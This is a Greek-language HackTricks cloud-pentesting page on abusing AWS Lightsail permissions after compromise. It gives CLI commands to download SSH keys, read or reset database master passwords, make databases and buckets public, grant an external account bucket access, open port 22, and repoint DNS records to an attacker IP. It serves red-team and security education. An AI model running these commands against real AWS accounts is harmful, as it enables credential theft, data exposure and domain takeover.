Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Για περισσότερες πληροφορίες σχετικά με το Lightsail, ελέγξτε:
{% content-ref url="../aws-services/aws-lightsail-enum.md" %} aws-lightsail-enum.md {% endcontent-ref %}
{% hint style="warning" %} Σημαντικό είναι να σημειωθεί ότι το Lightsail δεν χρησιμοποιεί ρόλους IAM που ανήκουν στον χρήστη αλλά σε ένα διαχειριζόμενο λογαριασμό AWS, οπότε δεν μπορείτε να καταχραστείτε αυτήν την υπηρεσία για ανέβασμα δικαιωμάτων. Ωστόσο, ευαίσθητα δεδομένα όπως κώδικας, κλειδιά API και πληροφορίες βάσης δεδομένων μπορεί να βρεθούν σε αυτήν την υπηρεσία. {% endhint %}
Αυτή η άδεια θα σας επιτρέψει να λάβετε τα κλειδιά SSH για πρόσβαση στις περιπτώσεις:
aws lightsail download-default-key-pair
Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στις περιπτώσεις.
Αυτή η άδεια θα σας επιτρέψει να δημιουργήσετε κλειδιά SSH για να αποκτήσετε πρόσβαση στις περιπτώσεις:
aws lightsail get-instance-access-details --instance-name <instance_name>
Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στις περιπτώσεις.
Αυτή η άδεια θα σας επιτρέψει να λάβετε ένα κλειδί για να αποκτήσετε πρόσβαση στο κάδο:
aws lightsail create-bucket-access-key --bucket-name <name>
Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στον κάδο.
Αυτή η άδεια θα σας επιτρέψει να λάβετε τα διαπιστευτήρια για να αποκτήσετε πρόσβαση στη βάση δεδομένων:
aws lightsail get-relational-database-master-user-password --relational-database-name <name>
Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στη βάση δεδομένων.
Αυτή η άδεια θα σας επιτρέψει να αλλάξετε τον κωδικό πρόσβασης για πρόσβαση στη βάση δεδομένων:
{% code overflow="wrap" %}
aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>
{% endcode %}
Εάν η βάση δεδομένων δεν είναι δημόσια, μπορείτε επίσης να την καταστήσετε δημόσια με αυτές τις άδειες με
{% code overflow="wrap" %}
aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
{% endcode %}
Πιθανές Επιπτώσεις: Εύρεση ευαίσθητων πληροφοριών μέσα στη βάση δεδομένων.
Αυτή η άδεια επιτρέπει το άνοιγμα θυρών προς το Διαδίκτυο.
aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22
Πιθανή Επίδραση: Πρόσβαση σε ευαίσθητες θύρες.
Αυτή η άδεια επιτρέπει το άνοιγμα θυρών προς το Διαδίκτυο. Σημειώστε ότι η κλήση θα κλείσει οποιαδήποτε θύρα που δεν έχει καθοριστεί σε αυτήν.
aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22
Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητες θύρες.
Αυτές οι άδειες επιτρέπουν την παροχή πρόσβασης σε ένα instance σε ένα bucket χωρίς καμία επιπλέον διαπιστευτήρια
{% code overflow="wrap" %}
aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow
{% endcode %}
Πιθανές Επιπτώσεις: Πιθανή νέα πρόσβαση σε κάδους με ευαίσθητες πληροφορίες.
Με αυτήν την άδεια, ένας επιτιθέμενος μπορεί να χορηγήσει στον δικό του λογαριασμό AWS πρόσβαση για ανάγνωση σε κάδους ή ακόμα και να καταστήσει τους κάδους δημόσιους για όλους:
# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>
# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true
# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
Πιθανή Επίδραση: Πιθανή νέα πρόσβαση σε κάδους με ευαίσθητες πληροφορίες.
Με αυτές τις άδειες, ένας επιτιθέμενος μπορεί να χορηγήσει πρόσβαση σε ιδιωτικά ECRs από την υπηρεσία containers.
aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}
Πιθανές Επιπτώσεις: Απόκτηση ευαίσθητων πληροφοριών από ιδιωτικό ECR
Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να δημιουργήσει υποτομέα και να τον κατευθύνει στη δική του διεύθυνση IP (subdomain takeover), ή να δημιουργήσει ένα SPF record που του επιτρέπει να παραποιήσει emails από τον τομέα, ή ακόμα και να ορίσει τον κύριο τομέα στη δική του διεύθυνση IP.
aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0
Πιθανές Επιπτώσεις: Απόκτηση ελέγχου ενός τομέα
Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να δημιουργήσει έναν υποτομέα και να τον κατευθύνει προς τη δική του διεύθυνση IP (subdomain takeover), ή να δημιουργήσει έναν SPF εγγραφή που του επιτρέπει να πλαστογραφεί emails από τον τομέα, ή ακόμα και να ορίσει τον κύριο τομέα στη δική του διεύθυνση IP.
aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0
Πιθανές Επιπτώσεις: Απόκτηση ελέγχου ενός τομέα
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.